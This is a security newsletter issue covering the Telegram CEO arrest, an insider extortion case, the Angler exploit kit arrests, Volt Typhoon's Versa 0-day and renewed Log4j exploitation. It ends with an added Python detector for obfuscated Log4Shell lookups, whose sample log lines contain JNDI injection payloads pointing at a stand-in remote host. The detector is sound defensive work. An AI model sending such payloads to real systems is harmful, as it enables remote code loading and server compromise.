šŸŽ“ļø Vulnerable U | #079

Telegram CEO saga, Russian APT group using Predator and Pegasus spyware code, Bounty for info on Angler Exploit Dev, Volt Typhoon 0day hacking ISPs, and more!

Read Time: 7 minutes

Howdy friends!

Anyone else just really tired this week? I feel like a bunch of people I've bumped into, myself included, are running in a lower gear the past few days.

I did have some time this morning with a good friend that really invigorated me. We're also hiring a bit of help on the Vulnerable U side of things to bring you all even cooler stuff in the coming months. Excited!

Let's get Vulnerable.

ICYMI

šŸ–Šļø Something I wrote: This thread on the TechCrunchā€™s highlight of the best talks out of Vegas this month

šŸŽ§ļø Something I heard: Anyone else on D&D social algorithm? I started getting memes related to a fake campaign involving a Goblin named Fartbuckle and it features an epic new Childish Gambino song. RIP Fartbuckle.

🎤 Something I said: I was on the Decipher podcast and I've gotten about half a dozen texts from people saying it was a good one. So apparently folks listen to it and I didn't make a fool of myself.

🔖 Something I read: My friend Jen Leggio's interview with my other friend Runa - Rising Tides: Runa Sandvik on Creating Work that Makes a Difference

📣 Sponsor

Advanced Kubernetes Security Best Practices

In this new Kubernetes Security Cheat Sheet, Wiz shares 10 advanced steps to safeguard your Kubernetes Clusters across the following areas:

Components 
- End-to-end TLS communications for etcd
- Securing kubelets
- Securing the API server via third-party authentication

Network security
- Network policies
- Monitoring traffic and communication

Pods 
- Admission controllers and validating admission policies
- Process whitelisting

Unlock these actionable Kubernetes Security best practices today.

Vulnerable News

Telegram Saga

Ok there is a lot here. Telegram CEO got arrested and the whole Internet blew up into attack vs. defend Telegram camps.

I don't have a lot of opinions on his arrest itself. But boy howdy do people have a misguided view of what Telegram is. A LOT of people in my comments saying this is because Telegram is so secure that the government can't get access to data. I can't state clearly enough that Telegram is not to be viewed as an encrypted messenger. It has end-to-end encrypted "Secret Chats," but they are off by default and only work one-to-one; everything else is stored on Telegram's servers in a form Telegram can read, and unlike Signal, the server side is closed source.

Also, the most popular feature of Telegram is the group chats à la Discord, and those can never be end-to-end encrypted, so cops can just join a public group and see everything.

Lot to read here if you're into it:

Remember when I told you about this 0-click IPv6 vuln that all Windows boxes were vulnerable to? And then remember I said as soon as a PoC was available it would be a way higher priority and more likely to be exploited. Well today is the day! Get to patching if you haven't already! (read more)

You know what they say about not burning bridges when you leave a job? Well, Daniel Rhyne from Kansas City took that advice, crumpled it up, and set it on fire. This 57-year-old core infrastructure engineer decided to go out with a bang, locking Windows admins out of 254 servers and demanding €700,000 in Bitcoin. Taking a severance package into your own hands.

Our wannabe hacker extraordinaire thought he was being clever, using a hidden VM for his dirty work and scheduling tasks to change passwords to "TheFr0zenCrew!" But pro tip: if you're planning cybercrime, maybe don't use your work laptop to Google "how to delete domain accounts" and "command line to change local administrator password."

The FBI wasn't amused, and now Rhyne's facing up to 35 years in prison and a $750,000 fine. Looks like he'll have plenty of time to brush up on his cybersecurity skills. (read more)

Angler Exploit Kit… Now there is a name I haven't heard in a long time. If you were in infosec around 10 years ago, this thing was everywhere. It was the bane of our existence. You think ransomware is bad now? People were getting popped via ads on normal news websites. I can say one good thing about it though: I think it was part of what finally killed Flash. Angler would have a new Flash RCE every freaking week. Jeremiah Grossman once called it death by slow roll 0day. Adobe published stats on how much it cost them to fix a bug that was publicly disclosed first, and it was… not cheap.

Anyway. The couple of guys behind Angler are getting arrested. One is already locked up and they're putting a bounty on the other.

“Kadariya was identified as one of Maksim Silnikau's co-conspirators, who participated in global-scale malware distribution operations with Andrei Tarasov.

Silnikau (aka "J.P. Morgan"), the creator and operator of Ransom Cartel, Reveton ransomware, and Angler Exploit Kit, was arrested in Spain and later extradited to the United States, where he faces multiple charges incurring sentences of up to 100 years in prison.” (read more)

This story isn't getting enough attention IMO. There are reports coming out that China's Volt Typhoon has been exploiting a 0-day in Versa Director, which is used by some major ISPs.

“After gaining access to the victims' networks via the exposed Versa management port, the attackers deployed the VersaMem web shell, which steals credentials and then allows Volt Typhoon to access the service providers' customers' networks as authenticated users.”

Also kind of wild: in the vulnerability advisory, Versa then blames its customers for leaving the management port open on the Internet. I mean they're not wrong, but…

The scary part for me: “Volt Typhoon's choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the U.S. authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT [operational technology] assets to disrupt functions,” (read more)

Ukrainian hackers have struck again, this time hitting Russian TV channels right where it hurts - prime time. According to a source in Ukraine's military intelligence (HUR), they managed to break into several Russian TV servers and broadcast "objective videos about the war in Ukraine."

The hack reportedly affected nine channels, including some owned by Russian oligarch Andrey Komarov. Most had to suspend broadcasting, with only a couple partially resuming operations as of Aug 22. One TV company even issued an apology on VKontakte, blaming "attackers" for airing content that "contradicts the TV channel's policy."

This isn't HUR's first rodeo - they've previously claimed responsibility for cyberattacks on Russian websites and financial institutions. (read more)

Microsoft's throwing a cybersecurity shindig next month, and it's all thanks to that little CrowdStrike incident that had Windows blue-screening left and right in July. They're inviting the who's who of the security world to their Redmond campus on September 10th to brainstorm how to avoid another dumpster fire.

Seems like they're proposing shifting more security operations from kernel mode to user mode. It's not a silver bullet, but it could help prevent small hiccups from turning into system-wide meltdowns.

They're also talking about eBPF tech and memory-safe languages like Rust. It's a delicate dance though - these security tools need deep access to do their job, but that same access can cause chaos when things go sideways. (read more)

Clint is the man. He went through and found every talk from summer camp that had anything to do with AI and compiled them all together. With summaries and his thoughts on it to boot. Epic work Clint! (read more)

Log4j?! Insert What Year Is It?! Meme. Anyway, great report from the security team at Datadog, who dug in after scratching their heads over a new wave of Log4j exploitation hitting some honeypots. Threat actors are still tweaking their post-exploitation techniques around this bug, years after the patch. Report full of techniques and IOCs for your reading pleasure. (read more)
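The real IOCs are in the Datadog report linked above. As an added example that is not from that report or from this newsletter, here is a small Python detector that strips the common Log4Shell lookup obfuscation (nested ${lower:}/${upper:} lookups and ${env:X:-default}-style defaults) before checking for a JNDI lookup, run over a few constructed access-log lines. The IP addresses, paths and user agents are made up for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (made up for this example, not from the
# Datadog report). Lines 2-4 carry Log4Shell-style probes with increasing
# levels of lookup obfuscation; lines 1 and 5 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [27/Aug/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [27/Aug/2024:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [27/Aug/2024:10:01:04 +0000] "GET /?x=${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.8 - - [27/Aug/2024:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [27/Aug/2024:10:01:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup using one of the schemes the Log4j JNDI plugin will dereference.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*://([^}]*)\}",
    re.IGNORECASE,
)


def _resolve_lookup(body: str) -> Optional[str]:
    """Statically evaluate one lookup body, or return None to leave it alone."""
    key, sep, value = body.partition(":")
    key = key.strip().lower()
    if sep and key == "lower":
        return value.lower()
    if sep and key == "upper":
        return value.upper()
    if key == "jndi":
        return None  # never rewrite the lookup we are trying to find
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:x:-n}, ${::-r}: the variable is (almost always)
        # unset, so Log4j substitutes the default value after ':-'.
        return body.split(":-", 1)[1]
    return None  # date:, ctx:, ... are left in place


def normalize(text: str, max_rounds: int = 50) -> str:
    """Collapse nested lookups innermost-first until nothing else resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(m) -> str:
            nonlocal changed
            resolved = _resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return details of a JNDI lookup found after de-obfuscation, else None."""
    normalized = normalize(line)
    m = JNDI_LOOKUP.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "target": m.group(2), "normalized": normalized}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Scan every line; each finding carries its 1-based line number."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit:
            findings.append({"line": number, **hit})
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']}://{f['target']}")
```

Running it against the constructed lines flags lines 2, 3 and 4 and ignores the harmless ${date:yyyy} on line 5. The point of normalizing first is that a plain grep for "jndi:" misses the nested-lookup variants in lines 3 and 4, which is exactly the kind of tweak still showing up on honeypots.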

Miscellaneous mattjay

This meme got me really good. My friends were eye rolling at me for laughing so hard.

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.


Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay